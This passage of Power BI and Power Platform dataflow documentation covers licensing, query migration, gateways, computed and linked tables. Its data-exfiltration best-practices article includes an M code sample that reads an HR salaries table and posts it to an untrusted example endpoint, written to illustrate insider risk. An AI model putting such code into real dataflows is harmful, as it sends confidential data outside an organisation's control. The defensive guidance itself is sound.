dataflows, and feature availability in each product or dataflow type, it's important to
know what licensing options you need to use dataflows.

Creating dataflows in Power BI workspaces


If you want to create dataflows in Power BI workspaces, you need to have a paid Power
BI Pro license. A Power BI free license doesn't give you the ability to create dataflows.
Depending on the features you use, Power BI Premium (per user) or embedded capacity
is required.

A Power BI Pro account is available on a per-user, per-month basis. Multiple options are available for premium or embedded capacities.

Creating dataflows in Microsoft Power Platform environments
If you want to create dataflows in the Microsoft Power Platform environment, a Power
Apps (per-user or per-app) license is required.

If you want to create analytical dataflows that store data in your organization's Azure
Data Lake Storage Gen2 account, you or your administrator need access to an Azure
subscription and an Azure Data Lake Storage Gen2 account.

Premium features
Some of the dataflow features are limited to premium licenses. If you want to use the
enhanced compute engine to speed up your dataflow queries' performance over
computed tables, or have the DirectQuery connection option to the dataflow, you need
to have Power BI P1 or A3 or higher capacities.
AI capabilities in Power BI, linked table, and computed table are all premium functions
that aren't available with a Power BI Pro account.

List of features
The following table contains a list of features and the license needed for them to be
available.

| Feature | Power BI | Power Apps |
| --- | --- | --- |
| Store data in Dataverse tables (standard dataflow) | N/A | Per-app plan, Per-user plan |
| Store data in Azure Data Lake Storage (analytical dataflow) | Yes | Yes, using analytical dataflows |
| Store data in customer-provided Azure Data Lake Storage (analytical dataflow; bring your own Azure Data Lake Storage) | Yes | Per-app plan, Per-user plan |
| The enhanced compute engine (running on Power BI Premium capacity / parallel execution of transforms) | Power BI Premium only | N/A |
| DirectQuery connection to dataflow | Power BI Premium only | N/A |
| AI capabilities in Power BI | Power BI Premium only | N/A |
| Linked tables | Power BI Premium only | Yes, using analytical dataflows |
| Computed tables (in-storage transformations using M) | Power BI Premium only | Yes, using analytical dataflows |
| Schedule refresh | Yes | Yes |
| Dataflow authoring with Power Query Online | Yes | Yes |
| Dataflow management | Yes | Yes |
| New connectors | Yes | Yes |
| Standardized schema, built-in support for Common Data Model | Yes | Yes |
| Dataflows data connector in Power BI Desktop | Yes | Yes, using analytical dataflows |
| Dataflow incremental refresh | Power BI Premium only | Yes, using analytical dataflows with the per-user plan |

Limitations on each license


The preceding table shows what features each license gives you. The following sections
provide details about some of the limitations of each license.

Power Apps licenses


If you use a Power Apps license to create dataflows, there's no limitation on the number
of dataflows and tables you can create. However, there's a limitation on the size of
Dataverse service you can use and refresh performance.

The Power Apps per-app plan covers up to a 50-MB database capacity. The Power Apps
per-user plan allows you to have a database of 250-MB capacity.

The following limitations are in place in Power Apps:

A dataflow refresh can run for a maximum of 24 hours.


Each query/partition has a maximum run duration of four hours.
For each refresh, there's a concurrency limit of four queries/partitions that can
refresh simultaneously.
Power Query Online refresh limits apply for each user. More information: Refresh
limits

Power BI Pro
Power BI Pro gives you the ability to create analytical dataflows, but not use any of the
premium features. With a Power BI Pro account, you can't use linked or computed
tables, you can't use AI capabilities in Power BI, and you can't use DirectQuery to
connect to the dataflow. The storage for your dataflows is limited to the space left under
your Power BI Pro account, which is a subset of 10-GB storage for all Power BI content.
Currently, the Power BI portal doesn't report the storage usage of dataflows. You'll be notified when you've almost reached the limit of the remaining capacity.

Power BI Premium
If you use Power BI Premium (capacity-based licensing), you can use all the AI
capabilities in Power BI, computed tables and linked tables, with the ability to have a
DirectQuery connection to the dataflow. You can also use the enhanced compute
engine. However, the dataflow created under a premium capacity license uses only the
internal Azure Data Lake Storage, and isn't accessible by other platforms except Power
BI itself. You can't create external dataflows just by having a Power BI Premium license;
you need to have an Azure subscription for Azure Data Lake Storage as well.

Limitations per premium capacity

Dataflows that are using a premium capacity to refresh the data are limited to the
maximum number of parallel tasks they can perform at a given time. The maximum
number of parallel tasks depends on the type of premium capacity you're using. This
table represents the maximum number of parallel tasks that can be run at a given time
by all dataflows in a workspace mapped to the capacity.

Parallel tasks
A premium capacity can run multiple evaluations in parallel. For example, suppose you have a P4 capacity and a dataflow that consists of 84 tasks. When you refresh the dataflow, the first 64 tasks are allocated to the refresh, and the remaining 20 evaluations are parked in a queue. As each evaluation finishes, the next evaluation in the queue starts. If you start another dataflow in the same workspace on the same premium capacity while the first is still running, its evaluations are parked in the same queue and must wait for the other dataflows in the workspace before your data refresh starts.

You can use the following pointers to estimate the number of tasks of your dataflow
refresh:

The number of queries executed in the refresh (don't forget the upstream linked
tables).
Each partition in an incremental refresh query counts as an extra task.

Strategy to lower the number of tasks during refresh

To lower the number of tasks or improve the efficiency of your tasks, you can use the
following strategies:
Lower the number of queries in your dataflow by combining queries where
possible and only "enable load" for queries that are used downstream.
Evaluate if you really need the upstream linked tables to refresh automatically.
Strategically schedule your dataflow refreshes based on the number of tasks.
Make sure your query returns the minimum set of columns and rows needed to satisfy your data needs, as shown in the sketch after this list. The faster and more efficiently a task executes, the sooner the next task can start.
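
For the last point in the list, a minimal sketch of trimming a query early might look like the following; the server, table, and column names are placeholders.

```powerquery-m
let
    Source = Sql.Database("contoso-sql.database.windows.net", "SalesDb"),
    Orders = Source{[Schema = "dbo", Item = "Orders"]}[Data],
    // Keep only the columns the downstream tables actually need
    SelectedColumns = Table.SelectColumns(Orders, {"OrderId", "OrderDate", "Amount"}),
    // Filter rows as early as possible so each task moves and transforms less data
    RecentOrders = Table.SelectRows(SelectedColumns, each [OrderDate] >= #date(2023, 1, 1))
in
    RecentOrders
```

Trimming columns and filtering rows early also gives query folding a better chance of pushing the work back to the source when the connector supports it.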

Using your organization's Azure Data Lake Storage account for dataflow storage
To create dataflows that store data in your organization's Azure Data Lake Storage
account, in addition to the product licenses above, you must have an Azure subscription.
The amount of storage that can be used isn't limited by the dataflow or the product it
was created in.

Next step
If you want to read more details about the concepts discussed in this article, go to any
of the following links.

Pricing
Power BI pricing
Power Apps pricing
Azure Data Lake Storage Gen 2 pricing

Features
Computed tables
Linked tables
AI capabilities in Power BI dataflows
Standard vs. analytical dataflows
The enhanced compute engine
How to migrate queries from Power
Query in the desktop (Power BI and
Excel) to dataflows
Article • 02/17/2023

If you already have queries in Power Query, either in Power BI Desktop or in Excel, you
might want to migrate the queries into dataflows. The migration process is simple and
straightforward. In this article, you'll learn the steps to do so.

To learn how to create a dataflow in Microsoft Power Platform, go to Create and use
dataflows in Power Platform. To learn how to create a dataflow in Power BI, go to
Creating and using dataflows in Power BI.

Migrating the queries from the desktop


To migrate queries from Power Query in the desktop tools:

1. Open Power Query Editor:

In Power BI Desktop on the Home tab, select Transform data.

In Excel on the Data tab, select Get Data> Launch Power Query Editor.
2. Copy the queries:

If you've organized your queries into folders (called groups in Power Query):

a. In the Queries pane, select Ctrl as you select the folders you want to migrate to
the dataflow.

b. Select Ctrl+C.
If you don't have folders:

a. In the Queries pane, select Ctrl as you select the queries you want to migrate.

b. Select Ctrl+C.
3. Paste the copied queries into a dataflow:

a. Create a dataflow, if you don't have one already.

b. Open the dataflow in Power Query Editor, and in the Queries pane, select
Ctrl+V to paste the copied folders or queries.
The image below shows an example of successfully copied folders.

4. Connect the on-premises data gateway.

If your data source is an on-premises source, you need to perform an extra step.
Examples of on-premises sources can be Excel files in a shared folder in a local
domain, or a SQL Server database hosted in an on-premises server.

A dataflow, as a cloud-based service, requires the on-premises data gateway to connect to the on-premises data source. You need to install and configure the
gateway for that source system, and then add the data source for it. After you've
completed these steps, you can select the on-premises data gateway when you
create the entity in the dataflow.

The gateway isn't needed for data sources residing in the cloud, such as an Azure
SQL database.

5. Configure the connection to the data source by selecting Configure connection and entering credentials or anything else you need to connect to the data source at this stage.

6. Verify the connection:

If you've done all the steps successfully, you'll see a preview of the data in the
Power Query Editor.

Some Power Query Desktop functions require a gateway in Power Query Online
Some of the functions might require a gateway, even if their source is not located on-
premises. Among these are functions such as Web.BrowserContents and Web.Page. If
this happens, you might get an error message indicating which specific function isn't
supported. The figure below shows an example of one of these scenarios.
If a scenario like this happens, you have two options. You can set up the gateway for
that data source, or you can update the query in the Power Query Editor for the
dataflow by using a set of steps that are supported without the need for the gateway.
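
For example, a query along the lines of the following sketch uses Web.BrowserContents, and therefore needs a gateway (or a rewrite) to run in Power Query Online; the URL and CSS selector here are hypothetical.

```powerquery-m
let
    // Web.BrowserContents renders the page in a browser engine and returns its HTML
    Source = Web.BrowserContents("https://www.example.com/prices"),
    // Html.Table extracts values from the HTML by using CSS selectors
    PriceTable = Html.Table(Source, {{"Price", "TABLE > TR > TD:nth-child(1)"}})
in
    PriceTable
```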

Refresh the dataflow entities


After migrating your queries to the dataflow, you must refresh the dataflow to get data
loaded into these entities. You can refresh a dataflow manually or configure an
automatic refresh based on the schedule of your choice.

Get data from Power Query Desktop


You can now get data from dataflow entities in Power BI Desktop by using the Power
Platform dataflow or Dataverse connectors (depending on what type of dataflow you're
using, analytical or standard). More information: Connect to data created by Power
Platform dataflows in Power BI Desktop
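
For reference, the query that the Power Platform dataflows connector generates in Power BI Desktop follows a navigation pattern similar to the following sketch; the workspace, dataflow, and table identifiers are placeholders, and the exact navigation record fields can vary, so it's usually easier to pick the table in the Navigator than to type this by hand.

```powerquery-m
let
    Source = PowerPlatform.Dataflows(null),
    Workspaces = Source{[Id = "Workspaces"]}[Data],
    // Placeholder GUIDs for the workspace and dataflow
    Workspace = Workspaces{[workspaceId = "00000000-0000-0000-0000-000000000000"]}[Data],
    Dataflow = Workspace{[dataflowId = "00000000-0000-0000-0000-000000000000"]}[Data],
    Account = Dataflow{[entity = "Account", version = ""]}[Data]
in
    Account
```
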
Using an on-premises data gateway in
Power Platform dataflows
Article • 02/17/2023

Install an on-premises data gateway to transfer data quickly and securely between a
Power Platform dataflow and a data source that isn't in the cloud, such as an on-
premises SQL Server database or an on-premises SharePoint site. You can view all
gateways for which you have administrative permissions and manage permissions and
connections for those gateways.

Prerequisites

Power BI service
A Power BI service account. Don't have one? Sign up for 60 days free.

Administrative permissions on a gateway. These permissions are provided by default for gateways you install. Administrators can grant other people permissions for gateways.

Power Apps
A Power Apps account. Don't have one? Sign up for 30 days free.

Administrative permissions on a gateway. These permissions are provided by default for gateways you install. Administrators can grant other people permissions for gateways.

A license that supports accessing on-premises data using an on-premises gateway. More information: "Connect to your data" row of the "Explore Power Apps plans" table in the Power Apps pricing page.

Install a gateway
You can install an on-premises data gateway directly from the online service.

7 Note
It's a good general practice to make sure you're using a supported version of
the on-premises data gateway. We release a new update of the on-premises
data gateway every month. Currently, Microsoft actively supports only the last
six releases of the on-premises data gateway.
Starting April 2022, the minimum required gateway version is February 2021. Dataflows that refresh using an earlier version of the gateway might stop refreshing.

Install a gateway from Power BI service


To install a gateway from Power BI service:

1. Select the downloads button in the upper right corner of Power BI service, and
choose Data Gateway.

2. Install the gateway using the instructions provided in Install an on-premises data
gateway.

Install a gateway from Power Apps


To install a gateway from Power Apps:

1. In the left navigation pane of powerapps.com, select Data > Gateways.

2. Select New gateway.
3. In the On-Premises Data Gateway section, select Download.

4. Install the gateway using the instructions provided in Install an on-premises data
gateway.

Use an on-premises data source in a dataflow


1. For instructions on how to create a new dataflow, go to Create a dataflow from a
data source.

2. Select an on-premises data source from the data sources list.

3. Provide the connection details for the enterprise gateway that will be used to
access the on-premises data. You must select the gateway itself, and provide
credentials for the selected gateway. Only gateways for which you're an
administrator appear in the list.

You can change the enterprise gateway used for a given dataflow and change the
gateway assigned to all of your queries using the dataflow authoring tool.

7 Note

The dataflow will try to find or create the required data sources using the new gateway. If it can't do so, you won't be able to change the gateway until all needed data sources are available from the selected gateway.

View and manage gateway permissions

Power BI service gateway permissions


1. Select the setup button in the upper right corner of Power BI service, choose
Manage gateways, and then select the gateway you want.
2. To add a user to the gateway, select the Administrators table and enter the email
address of the user you would like to add as an administrator. Creating or
modifying data sources in dataflows requires Admin permissions to the gateway.
Admins have full control of the gateway, including adding users, setting
permissions, creating connections to all available data sources, and deleting the
gateway.

The following conditions apply when adding a user to the gateway:

1. If we detect that an existing data source is available for the selected gateway, the
Username and Password fields will be pre-populated.

a. If you select Next at this point, you're considered to be using that existing data
source, and so you only need to have permissions to that data source.

b. If you edit any of the credential fields and select Next, then you're considered to
be editing that existing data source, at which point you need to be an admin of
the gateway.

2. If we don't detect that an existing data source is available for the selected gateway,
the Username and Password fields will be blank, and if you edit the credential
fields and select Next, then you're considered to be creating a new data source on
the gateway, at which point you need to be an admin of the gateway.
If you only have data source user permission on the gateway, then 1.b and 2 can't be
achieved and the dataflow can't be created.

Power Apps gateway permissions


1. In the left navigation pane of powerapps.com , select Gateways and then select
the gateway you want.

2. To add a user to a gateway, select Users, specify a user or group, and then specify
a permission level. Creating new data sources with a gateway in dataflows requires
Admin permission on the gateway. Admins have full control of the gateway,
including adding users, setting permissions, creating connections to all available
data sources, and deleting the gateway.

View and manage gateway connections

Power BI service gateway connections


1. Select the setup button in the upper right corner of Power BI service, choose
Manage gateways, and then select the gateway you want.

2. Perform the action that you want:

To view details and edit the settings, select Gateway Cluster Settings.
To add users as administrators of the gateway, select Administrators.
To add a data source to the gateway, select Add Data Source, enter a data
source name and choose the data source type under Data Source Settings,
and then enter the email address of the person who will use the data source.
To delete a gateway, select the ellipsis to the right of the gateway name and
then select Remove.

Power Apps gateway connections


1. In the left navigation bar of powerapps.com, select Gateways, and then choose the
gateway you want.

2. Perform the action that you want:

To view details, edit the settings, or delete a gateway, select Connections, and
then select a connection.

To share a connection, select Share and then add or remove users.


7 Note

You can only share some types of connections, such as a SQL Server
connection. For more information, see Share canvas-app resources in
Power Apps.

For more information about how to manage a connection, see Manage


canvas-app connections in Power Apps.

Limitations
There are a few known limitations when using enterprise gateways and dataflows.

Dataflow refresh might fail if an out-of-date data gateway is used. Starting April
2022, the minimum required data gateway version is February 2021.

Each dataflow can use only one gateway. As such, all queries should be configured
using the same gateway.

Changing the gateway impacts the entire dataflow.

If several gateways are needed, the best practice is to build several dataflows (one
for each gateway). Then use the compute or table reference capabilities to unify
the data.

Dataflows are only supported using enterprise gateways. Personal gateways won't
be available for selection in the drop-down lists and settings screens.

Creating new data sources with a gateway in dataflows is only supported for people with Admin permissions.

Users with Can Use or Can Use + Share permissions can use existing connections
when creating dataflows.

The following connectors are supported:


DB2
File System
Apache Impala
Informix
MySQL
Oracle Database
PostgreSQL
SAP ERP
SharePoint
SQL Server
Teradata
Desktop flows
HTTP with Azure AD

Troubleshooting
When you attempt to use an on-premises data source to publish a dataflow, you might
come across the following MashupException error:

AzureDataLakeStorage failed to get the response:


'The underlying connection was closed: An unexpected error occurred on a
send.'

This error usually occurs because you're attempting to connect to an Azure Data Lake
Storage endpoint through a proxy, but you haven't properly configured the proxy
settings for the on-premises data gateway. To learn more about how to configure these
proxy settings, go to Configure proxy settings for the on-premises data gateway.

For more information about troubleshooting issues with gateways, or configuring the
gateway service for your network, go to the On-premises data gateway documentation.

If you're experiencing issues with the gateway version you're using, try updating to the
latest version as your issue might have been resolved in the latest version. For more
information about updating your gateway, go to Update an on-premises data gateway.

Next steps
Create and use dataflows in Power Apps

Add data to a table in Microsoft Dataverse by using Power Query

Connect Azure Data Lake Storage Gen2 for dataflow storage


Data exfiltration considerations and
best practices for dataflows
Article • 08/07/2023

Fabric dataflows and Power Platform dataflows are Microsoft 365 services that enable
users to easily connect to, extract, move, and transform data across hundreds of
supported data sources. Dataflows build upon an underlying service called Power Query
Online, which hosts the data movement engine (Mashup Engine) as a cloud service. By
default, connectivity originates from this cloud location and has unrestricted access to
the internet. Therefore, when using dataflows to access and move sensitive data,
organizations should consider strategies to deter insiders from accidental or malicious
data exfiltration. This article outlines known risk factors and best practices for
safeguards.

Considerations

Arbitrary code execution


Dataflow ETL jobs are defined through programs written in a language called Power
Query M. In its default configuration, the Mashup Engine executes these programs in
the cloud, outside the tenant's network boundary, and with unrestricted internet access.
Users can author programs that connect to multiple data sources, and upon consent,
allow data to flow between these sources.

A trusted user who has access to sensitive data can author a program to push the data
to an untrusted data store. Since the Mashup Engine runs entirely in the cloud, it doesn't
go through corporate firewalls and proxy servers. So, it isn't subject to any data loss
prevention (DLP) policies that might be enforced by these networks. Since the point of
access is on the public internet, data can travel to any destination that the user has
access to—either through authentication or anonymous access. Here are some
examples of ways in which these programs can exfiltrate sensitive data:

Anonymous web requests: By using Web.Contents, users can make web requests with sensitive data in the body of the request (see the sketch after this list).
Cross data source filtering and joins: Sensitive data can be used as filtering or join
conditions against another untrusted data source. Specifically, data can travel to
the untrusted data source in the form of query strings or parameters.
Output destinations: By using Fabric dataflows, users can specify output
destinations for their queries, thereby transferring data to a list of supported data
sinks, which includes Azure SQL databases and data warehouses, Fabric
Lakehouses, Warehouses, and KQL databases.
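
To make the risk concrete, the following sketch shows the kind of program the first bullet describes: data is read from a trusted source and posted to an arbitrary endpoint. All server names and URLs here are hypothetical; the point is that nothing in the default cloud execution path blocks the outbound request.

```powerquery-m
let
    // Hypothetical trusted source containing sensitive data
    Sensitive = Sql.Database("hr-sql.contoso.com", "HR"),
    Salaries = Sensitive{[Schema = "dbo", Item = "Salaries"]}[Data],
    // Serialize the rows and send them to an untrusted endpoint in the request body
    Payload = Json.FromValue(Table.ToRecords(Salaries)),
    Response = Web.Contents("https://untrusted.example.com/collect", [Content = Payload])
in
    Response
```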

Cross-tenant data movement


The Mashup Engine requires data sources to be explicitly defined before making
connections. The data sources are bound to programs with a kind and path key (for
example, SQL;contoso.database.windows.net ). This binding provides an opportunity for
organizations to govern which data sources are permitted, by filtering based on the data
source paths. However, there are some data sources where the path is common across
all connections and data is segmented only by the tenant of the signed in user's OAuth
credentials. This scenario creates a risk factor for data exfiltration, where a user signs
into a higher security tenant and a lower security tenant and moves data between them.
Typically, this exfiltration can be done in two ways:

Outbound: A trusted user in a higher security tenant defines a dataflow in that environment and creates an output destination to a permitted data sink, but authenticates with the data sink using an account from a lower security tenant.
Inbound: A user in a lower security tenant defines a dataflow that reads data from
a sensitive data source in the higher security tenant. This definition can be
achieved by authenticating against the sensitive data source using a trusted
account in the higher security tenant.

Recommended best practices


DLP policies can operate at various OSI layers. In general, the more sensitive the data,
the lower the layer where the policies must be applied. Lower layer protocols are
typically more expensive to implement, harder to scale, and more difficult to operate.
For example, organizations with lower governance requirements might only need to
apply application layer policies. However, some organizations and entities processing
highly sensitive data might require extreme measures such as physical isolation. We
recommend that organizations handling sensitive data employ a combination of
application and network-level policies to protect against insider threats.

Network isolation
We recommend that all data stores containing sensitive data be network isolated to
permit access only from selected networks. This isolation restriction must be defined
and operated at the network layer or lower. For example, layer 3 firewalls, Network
Security Groups (NSGs), and Azure Private Links are good examples of mechanisms that
can be used. However, location-based conditional access policies in Azure Active
Directory (Azure AD) operate at the application layer and are considered insufficient for
this purpose.

These network isolation policies must obstruct line of sight from dataflows' cloud
execution engine to sensitive data stores (since the cloud engine runs on the public
internet). Dataflows' connectivity to these data stores is then forced to originate from
within one of the permitted networks by binding connections to an on-premises data
gateway or VNet data gateway. An important execution characteristic of dataflows is
that cloud-based evaluation and gateway-based evaluation are never blended. If a
dataflow needs to access a network isolated data store (and is therefore bound to a
gateway), all data access is then required to flow through the gateway. Additionally,
since gateways physically reside in networks controlled by the user tenant, they comply
with network level restrictions such as firewalls and DLP protection solutions. These
restrictions make gateway environments as secure and safe as any corporate managed
devices and mitigate risks associated with arbitrary code execution in a cloud
environment.

It's worth noting that network isolation must be applied to all data stores that might
contain sensitive data. Consider an example where a user creates a dataflow to read
data from OneDrive for Business into Power BI. Then the user later creates a linked
dataflow to transform the data in Power BI into downstream entities. In this scenario, it's
not sufficient to just isolate OneDrive for Business to trusted networks. Since sensitive
data might also reside within Power BI, it's important to isolate such data by enabling
private links and disabling public Internet access for Power BI. Learn more about secure
access to Power BI using private endpoints.
Force gateway execution
The goal for isolating sensitive data store to selected networks is to force the origin of
access back to trusted networks, so that existing policies governing managed devices
can be used to govern data movement from dataflows. In certain cases, a full network
isolation solution might take time to develop, test, and deploy. As an alternative, you
can file a dataflows support ticket to apply a tenant-wide policy that turns off the
Mashup Engine. This policy affects all query evaluations that use the Power Query
Online Mashup Engine. Impacted capabilities include:

Fabric dataflows
Power Platform dataflows
Azure Data Factory wrangling dataflows
Dataflows in Dynamics 365 (Customer Insights, Intelligent Order Management, and
so on)
Power BI Datamart
Power BI Quick Import from SharePoint

After application of the policy, all cloud-based execution fails with the following error:
Cloud evaluation request denied based on tenant policies. Please use a data gateway

and try again. This error effectively forces all query evaluations in the tenant to occur

on gateways, without first rolling out a full network isolation solution. Note that the
policy is applied to the entire tenant and not a subset of workloads. This policy means
existing workloads fail immediately and require manual intervention to convert to run
on gateways. Organizations applying this policy should also ensure that they have
enough capacity in their gateway clusters to accommodate all their workloads.

Tenant isolation
For most software-as-a-service (SaaS) layer data stores, such as Fabric Lakehouse and
Power Platform Dataverse, there's usually a multi-tenant endpoint that one
communicates with to gain access to the data. These endpoints are common across all
users of the service, so they can be difficult to isolate and protect solely using network
(Layer 3) isolation techniques. The recommended approach for this kind of data store is
to use Layer 7 policies, typically provided by Azure Active Directory:

Allow only Azure AD authentication. Remove anonymous and username/password


authentication schemes from the data store.
Use location policies to allow sign-in to the secured tenant only from managed
devices. Learn more.
Disallow unknown tenant sign-ins from managed devices by using Azure AD
tenant restrictions. Use tenant restrictions to manage access to SaaS apps. Learn
more.

This approach restricts access to the tenant’s sensitive data stores to a set of managed
devices where signing into another tenant isn't permitted, effectively isolating data
movement across the tenant.

Roadmap
The following list contains some of the features that are currently planned to help
organizations better manage data exfiltration risks in Fabric:

Data source connection allowlisting: Allows Fabric tenant admins to control the
kinds of connectors that can be used within the tenant, and the endpoints the
connectors can connect to.
Connection usage auditing: Support for auditing logs that track connection
creation, updating, deletion, and usage.
Creating computed tables in dataflows
Article • 08/04/2023

You can perform in-storage computations when using dataflows with a Power BI
Premium subscription. This lets you do calculations on your existing dataflows, and
return results that enable you to focus on report creation and analytics.

To perform in-storage computations, you first must create the dataflow and bring data
into that Power BI dataflow storage. After you have a dataflow that contains data, you
can create computed tables, which are tables that do in-storage computations.

There are two ways you can connect dataflow data to Power BI:

Using self-service authoring of a dataflow


Using an external dataflow

The following sections describe how to create computed tables on your dataflow data.

How to create computed tables


After you have a dataflow with a list of tables, you can perform calculations on those
tables.

In the dataflow authoring tool in the Power BI service, select Edit tables. Then right-click
the table you want to use as the basis for your computed table and on which you want
to perform calculations. On the shortcut menu, select Reference.
For the table to be eligible as a computed table, Enable load must be selected, as shown
in the following image. Right-click the table to display this shortcut menu.

By selecting Enable load, you create a new table whose source is the referenced table.
The icon changes to the computed icon, as shown in the following image.
Any transformation you do on this newly created table will be run on the data that
already resides in Power BI dataflow storage. That means that the query won't run
against the external data source from which the data was imported (for example, the
SQL database from which the data was pulled).

Example use cases


What kind of transformations can be done with computed tables? Any transformation that you usually specify by using the transformation user interface in Power BI or the M editor is supported when performing in-storage computation.

Consider the following example. You have an Account table that contains the raw data
for all the customers from your Dynamics 365 subscription. You also have ServiceCalls
raw data from the service center, with data from the support calls that were performed
from the different accounts on each day of the year.

Imagine you want to enrich the Account table with data from ServiceCalls.

First you would need to aggregate the data from the ServiceCalls to calculate the
number of support calls that were done for each account in the last year.

Next, you merge the Account table with the ServiceCallsAggregated table to calculate
the enriched Account table.

Then you can see the results, shown as EnrichedAccount in the following image.

And that's it—the transformation is done on the data in the dataflow that resides in your
Power BI Premium subscription, not on the source data.
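
A sketch of the two computed-table queries described above might look like the following; the column names (AccountId, CallDate) are assumptions for illustration, and ServiceCalls refers to the table already ingested into dataflow storage.

```powerquery-m
// Query: ServiceCallsAggregated (computed table referencing ServiceCalls)
let
    Source = ServiceCalls,
    // Keep only the last year of calls, then count calls per account
    LastYear = Table.SelectRows(Source, each [CallDate] >= Date.AddYears(Date.From(DateTime.LocalNow()), -1)),
    ServiceCallsAggregated = Table.Group(LastYear, {"AccountId"},
        {{"SupportCallsLastYear", each Table.RowCount(_), Int64.Type}})
in
    ServiceCallsAggregated
```

The enriched table then merges the aggregate back into the Account table:

```powerquery-m
// Query: EnrichedAccount (computed table referencing Account)
let
    Source = Account,
    Merged = Table.NestedJoin(Source, {"AccountId"}, ServiceCallsAggregated, {"AccountId"}, "Calls", JoinKind.LeftOuter),
    EnrichedAccount = Table.ExpandTableColumn(Merged, "Calls", {"SupportCallsLastYear"})
in
    EnrichedAccount
```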

Considerations and limitations


It's important to note that if you remove the workspace from Power BI Premium
capacity, the associated dataflow will no longer be refreshed.

When working with dataflows specifically created in an organization's Azure Data Lake
Storage account, linked tables and computed tables only work properly when the tables
reside in the same storage account. More information: Connect Azure Data Lake Storage
Gen2 for dataflow storage

Linked tables are only available for dataflows created in Power BI and Power Apps. As a
best practice, when doing computations on data joined from on-premises and cloud sources, create a new table to perform those computations. This provides a better experience than using an existing table for computations, such as a table that's also querying data from both sources and doing in-storage transformations.

See also
Computed table scenarios and use cases

This article described computed tables and dataflows. Here are some more articles that
might be useful:

Self-service data prep in Power BI


Using incremental refresh with dataflows
Connect to data sources for dataflows
Link tables between dataflows

The following links provide additional information about dataflows in Power BI and
other resources:

Create and use dataflows in Power BI


Using dataflows with on-premises data sources
Developer resources for Power BI dataflows
Configure workspace dataflow settings (Preview)
Add a CDM folder to Power BI as a dataflow (Preview)
Connect Azure Data Lake Storage Gen2 for dataflow storage (Preview)

For more information about Power Query and scheduled refresh, you can read these
articles:

Query overview in Power BI Desktop


Configuring scheduled refresh

For more information about Common Data Model, you can read its overview article:

Common Data Model


Link tables between dataflows
Article • 08/04/2023

With dataflows in Microsoft Power Platform, you can have a single organizational data
storage source where business analysts can prep and manage their data once, and then
reuse it between different analytics apps in the organization.

When you link tables between dataflows, you can reuse tables that have already been
ingested, cleansed, and transformed by dataflows that are owned by others, without the
need to maintain that data. The linked tables simply point to the tables in other
dataflows, and don't copy or duplicate the data.

Linked tables are read-only, so if you want to create transformations for a linked table,
you must create a new computed table with a reference to the linked table.

Linked table availability


Linked table availability depends on whether you're using dataflows in Power BI or
Power Apps. The following sections describe the details for each.

Linked tables in Power BI


To be refreshed, linked tables require a Power BI Premium subscription. Linked tables are
available in any dataflow on a workspace that's hosted on Power BI Premium capacity.
There are no limitations on the source dataflow.

Linked tables only work properly in new Power BI workspaces, and, likewise, all linked
dataflows must be located in new workspaces. More information: Create the new
workspaces in Power BI

7 Note

Tables differ based on whether they're standard tables or computed tables.


Standard tables (often simply referred to as tables) query an external data source,
such as a SQL database. Computed tables require Premium capacity on Power BI
and run their transformations on data that's already in Power BI storage.

If your dataflow isn't located in a Premium capacity workspace, you can still
reference a single query—or combine two or more queries—as long as the
transformations aren't defined as in-storage transformations. Such references are
considered standard tables. To do this, turn off the Enable load option for the
referenced queries to prevent the data from being materialized and ingested into
storage. From there, you can reference those Enable load = false queries, and set
Enable load to On only for the resulting queries that you want to materialize.

Linked tables in Power Apps


For more information about the availability of linked tables in Power Apps, go to What
licenses do you need to use dataflows.

How to link tables between dataflows


There are a few ways to link tables between dataflows. To link tables in Power BI, you
must sign in with your Power BI credentials.

You can select Get data from the dataflow authoring tool, which displays a dialog box
for selecting the categories and each data source. Then select the Power Platform
Dataflows connector.

A connection window for the selected data connection is displayed. If credentials are
required, you're prompted to provide them.

In Power BI, you can select Add linked tables from the dataflow authoring tool.

You can also select Add linked tables from the Add tables menu in the Power BI service.

A Navigator window opens, and you can choose a set of tables you can connect to. The
window displays tables for which you have permissions across all workspaces and
environments in your organization.

After you select your linked tables, they appear in the list of tables for your dataflow in
the authoring tool, with a special icon identifying them as linked tables.

You can also view the source dataflow from the dataflow settings of your linked table.

Refresh logic of linked tables


The refresh logic of linked tables differs slightly based on whether you're using Power BI
or Power Apps, as described in the following sections.

Refresh logic in Power BI


The default refresh logic of linked tables depends on whether the source dataflow is in
the same Power BI workspace as the destination dataflow. The following sections
describe the behavior of each.
Links between workspaces: Refresh for links from tables in different workspaces
behaves like a link to an external data source. When the dataflow is refreshed, it
takes the latest data for the table from the source dataflow. If the source dataflow
is refreshed, it doesn't automatically affect the data in the destination dataflow.

Links in the same workspace: When data refresh occurs for a source dataflow, that
event automatically triggers a refresh process for dependent tables in all
destination dataflows in the same workspace, including any calculated tables
based on them. All other tables in the destination dataflow are refreshed according
to the dataflow schedule. Tables that depend on more than one source refresh
their data whenever any of their sources are refreshed successfully.

7 Note

The entire refresh process is committed at once. Because of this, if the data
refresh for the destination dataflow fails, the data refresh for the source
dataflow fails as well.

Refresh logic in Power Apps


The refresh logic of linked tables in Power Apps behaves like an external data source.
When the dataflow is refreshed, it takes the latest data for the table from the source
dataflow. If the source dataflow is refreshed, it doesn't automatically affect the data in
the destination dataflow.

Permissions when viewing reports from dataflows
When creating a Power BI report that includes data based on a dataflow, you can see
any linked tables only when you have access to the source dataflow.

Limitations and considerations


There are a few limitations to keep in mind when working with linked tables:

A table can be referenced by another dataflow. That referenced table can also be referenced by other dataflows, and so on, up to five times.
Cyclical dependencies of linked tables aren't allowed.
The dataflow must be in a new Power BI workspace or a Power Apps environment.
A linked table can't be joined with a regular table that gets its data from an on-
premises data source.
When using M parameters to address linked tables, if the source dataflow is
refreshed, it doesn't automatically affect the data in the destination dataflow.
Attempting to connect two dataflow tables between two workspaces of different
storage types—Bring Your Own Storage Account (BYOSA) and Internal—isn't
supported.

Next steps
The following articles might be useful as you create or work with dataflows:

Self-service data prep in Power BI


Using incremental refresh with dataflows
Creating computed tables in dataflows
Connect to data sources for dataflows

The following articles provide more information about dataflows and Power BI:

Create and use dataflows in Power BI


Using computed tables on Power BI Premium
Using dataflows with on-premises data sources
Developer resources for Power BI dataflows

For more information about Power Query and scheduled refresh, you can read these
articles:

Query overview in Power BI Desktop


Configuring scheduled refresh

For more information about Common Data Model, you can read its overview article:

Common Data Model - overview


Connect Azure Data Lake Storage Gen2
for dataflow storage
Article • 05/12/2023

You can configure dataflows to store their data in your organization's Azure Data Lake
Storage Gen2 account. This article describes the general steps necessary to do so, and
provides guidance and best practices along the way.

) Important

Dataflow with Analytical tables feature utilizes the Azure Synapse Link for Dataverse
